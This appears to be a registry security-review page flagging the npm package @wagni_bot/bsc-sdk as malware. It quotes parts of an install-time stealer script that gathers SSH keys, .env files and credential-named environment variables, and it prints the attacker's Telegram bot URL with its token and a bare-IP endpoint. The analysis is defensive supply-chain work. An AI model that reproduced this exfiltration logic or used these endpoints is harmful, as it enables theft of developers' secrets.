registry  /  @wagni_bot/bsc-sdk  /  1.0.0

@wagni_bot/bsc-sdk@1.0.0

Unofficial bsc-sdk SDK

AI Security Review

scanned 9h ago · by lpm-firewall-ai

The package runs an install-time script that harvests secrets and exfiltrates them to Telegram. The behavior is unrelated to the empty SDK entrypoint.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install of @wagni_bot/bsc-sdk@1.0.0
Impact
Leaks environment secrets, SSH keys/config, wallet or seed material, credential files, and host metadata to an attacker-controlled Telegram chat.
Mechanism
postinstall credential and file exfiltration
Attack narrative
During npm install, package.json runs postinstall.js. That script reports host/user/cwd/platform data, scans the project directory, home directory, and ~/.ssh for secret-related filenames, reads matched contents, collects credential-like environment variables, and sends the data to Telegram using a hardcoded bot token and chat id.
Rationale
Read-only source inspection confirms concrete install-time credential and sensitive file exfiltration to Telegram with no user consent or package-aligned purpose. This is malicious malware behavior and should be blocked.
Evidence
package.jsonpostinstall.jsindex.jsprocess.cwd() matched sensitive filesos.homedir() matched sensitive files~/.ssh matched sensitive files
Network endpoints1
api.telegram.org/bot8804087989:AAHUia-5DCloXsg9M9QhffTsHO5J_6FAxQM/sendMessage

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10023
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @wagni_bot/bsc-sdk (npm)
Details
@wagni_bot/bsc-sdk@1.1.0 is a typosquat of BSC-SDK-family packages whose sole purpose is credential theft at install time. index.js exports an empty object; the package provides no advertised BNB Smart Chain functionality. The postinstall lifecycle script recursively scans the current working directory, the user's home directory, and ~/.ssh for files matching id_rsa, id_ed25519, *.pem, *.key, *.cred, and.env, and POSTs their contents to a hardcoded bare-IP endpoint at http://107.161.90.180:7777. In parallel, it enumerates process.env for keys containing PRIVATE, SECRET, TOKEN, API_KEY, PASSWORD, MNEMONIC, SEED, WALLET, or AWS and transmits the matching key=value pairs along with hostname, username, and cwd to the same endpoint. The destination is a plaintext HTTP bare IP on a non-standard port, consistent with throwaway stealer infrastructure. Every developer and CI runner that runs `npm install` on this package has their SSH private keys, PEM certificates, and credential-shaped environment variables shipped to the attacker.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines install-time postinstall: node postinstall.js
  • postinstall.js POSTs to https://api.telegram.org/bot.../sendMessage using hardcoded bot token/chat id
  • postinstall.js scans process.cwd(), os.homedir(), and ~/.ssh for .env, credentials, keys, wallet, seed, mnemonic, and secret files
  • postinstall.js reads matched file contents and sends them via sendFile()
  • postinstall.js filters process.env for PRIVATE/SECRET/TOKEN/API_KEY/PASSWORD/MNEMONIC/SEED/WALLET/AWS and sends values
  • index.js is empty, leaving no benign SDK behavior to justify the install hook
Evidence against
  • No child_process, eval, or native binary loading observed
  • No persistence or destructive filesystem writes observed
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chain
HighEntropyStringsUrlStrings
Manifest
NoLicense
scanned 2 file(s), 4.10 KB of source, external domains: api.telegram.org

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
1#!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

postinstall.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> postinstall.js L1: #!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

postinstall.jsView on unpkg · L1

Findings

2 Critical1 High4 Medium5 Low
CriticalCredential Exfiltrationpostinstall.js
CriticalTrigger Reachable Dangerous Capabilitypostinstall.js
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNo License